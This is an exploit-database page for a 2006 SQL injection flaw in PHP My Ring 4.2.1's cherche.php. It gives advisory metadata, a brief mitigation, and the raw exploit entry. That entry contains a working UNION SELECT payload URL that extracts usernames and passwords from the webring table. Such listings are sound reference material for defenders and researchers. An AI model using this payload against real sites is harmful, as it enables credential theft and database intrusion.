header-logo
Suggest Exploit
vendor:
PHP My Ring
by:
ajann
9
CVSS
HIGH
Remote SQL Injection
89
CWE
Product Name: PHP My Ring
Affected Version From: 4.2.1
Affected Version To: 4.2.1
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

PHP My Ring <= 4.2.1 (cherche.php) Remote SQL Injection Vulnerability

A vulnerability exists in PHP My Ring <= 4.2.1 in the cherche.php script, which allows an attacker to inject arbitrary SQL queries. This can be exploited to gain access to the database and potentially gain access to sensitive information.

Mitigation:

Ensure that user-supplied input is properly sanitized and validated before being used in SQL queries.
Source

Exploit-DB raw data:

*******************************************************************************
# Title  :  PHP My Ring <= 4.2.1 (cherche.php) Remote SQL Injection Vulnerability
# Author :   ajann
*******************************************************************************

###http://[target]/[path]/cherche.php?limite=-1%20union%20select%200,pseudo,0,mdp,0,0%20from%20webring/*&mots=%20&where=description

# ajann,Turkey
# ...

# Im not Hacker!

# milw0rm.com [2006-10-29]